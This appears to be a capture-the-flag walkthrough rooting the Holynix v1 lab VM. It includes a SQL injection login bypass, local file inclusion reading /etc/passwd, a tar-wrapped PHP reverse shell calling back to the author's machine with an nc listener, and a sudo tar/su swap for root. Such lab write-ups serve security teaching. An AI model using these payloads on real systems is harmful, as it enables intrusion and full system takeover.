- VM: Holynix: v1
- Goal: acquire root access
- Approach: solve without automated exploitation tools
Network IP address fix
When I start the Holynix virtual machine using VMware Workstation 15 Player, the VM does not obtain an IP address automatically. I did the following to fix this issue:
- Reset the root password
- login to Holynix as root
- run command: rm /etc/udev/rules.d/70-persistent-net.rules
- reboot Holynix: shutdown -r 0
After doing this, the VM should obtain an IP address correctly. Note: if you like to maintain the original root password, record the root entry in /etc/shadow file right before changing the root password and then place it back after the procedue is completed.
First step is to locate the IP address of my target:
nmap -n -sn 192.168.172.200-254
nmap -p- -A 192.168.172.213
Only port 80 is open.
Let’s check out the website. There’s not many pages on the website. Only the home page and the login page.
Then at the login page, I test for SQL injection vulnerability and find that the password field is vulnerability by using a quote (‘) as password:
I then login without password using the following value as password:
' or 1 = 1#
Nice. Now I am logged in as user alamo. There’s a few links. Browse around to find more information. The most eye catching is the Upload link.Seems like I can upload files to the webserver. If I can view the page after upload, it may allow php code execution.
I then write up a simple file test.php to try:
<?php print "Hello" ?>
But unfortunately, user alamo does not have privilege to upload files.
Looks like I need to login as another user to try again. I then logout and use SQL injection again to login as another user:
‘ or 1 = 1 and username != ‘alamo’#
Good. This time logged in as etenenbaum. I then try uploading the test.php file again and succeeded. Now is to find where the file is. Since it’s called ‘Home Directory Uploader’, I try ~etenenbaum as the path:
But unfortunately, received Permission denied error when trying to browse test.php. Not good. Not give up yet. The uploader page has a checkbox ‘Enable the automatic extraction of gzip archives‘. I then make a copy of test.php to test2.php and compress it to test2.php.gz:
I then upload a gzip file instead to see what happened. No luck. While it says the file is uploaded successfully. Nothing shows up. It’s getting no where here so I move on to check other stuffs.
Let’s check out the Security link. This page has a drop down select menu to pick a policy type and then display the content. I setup Burp Suite as a proxy to intercept the request. I try to temper with a parameter called text_file_name to see if I can perform LFI (local file inclusion). I test it by changing the value to /etc/passwd.
Got it. The password file is shown. It’s vulnerable to LFI. With the ability to display files, I can check to see the code of transfer.php which is responsible to process the upload. So I use this vulnerability to display the content of transfer.php.
Upon reading the code, There’s couple things I found about uploading gzip archives:
- The upload content type must be application/gzip. I tested the upload using different browsers. Some browsers will use content type application/x-gzip or application/x-tar instead. If the upload doesn’t work, use Burp to check and ensure the content type is application/gzip
- sudo tar xzf is used to extract the files and then the upload file is removed. I used gzip to create the gzip file, that’s why it’s not working.
I then go back to use tar to compress the file:
tar czf test2.tar.gz test2.php
And try the upload again. This time the file is uploaded and extracted successfully. Try to browse the file and the page is shown with php code executed. Great news
There is a php reverse shell at /usr/share/webshells/php folder. Copy and modify it to using my kali box’s ip address and port 4444. Then proceed to gzip the file:
cp /usr/share/webshells/php/php-reverse-shell.php . nano php-reverse-shell.php tar czf rshell.tar.gz php-reverse-shell.php
The file is then uploaded to the server successfully.
Now start Netcat listener at the kali box:
nc -lp 4444
Then browse the reverse shell php file.
Awesome. Reverse shell obtained as user www-data.
I noticed the upload php code was using sudo tar & sudo mv. Perform a sudo -l confirms user www-data can do a few sudo commands:
This is enough to obtain root access with the following commands:
sudo mv /bin/tar /bin/tar.org sudo mv /bin/su /bin/tar sudo tar
Root access obtained!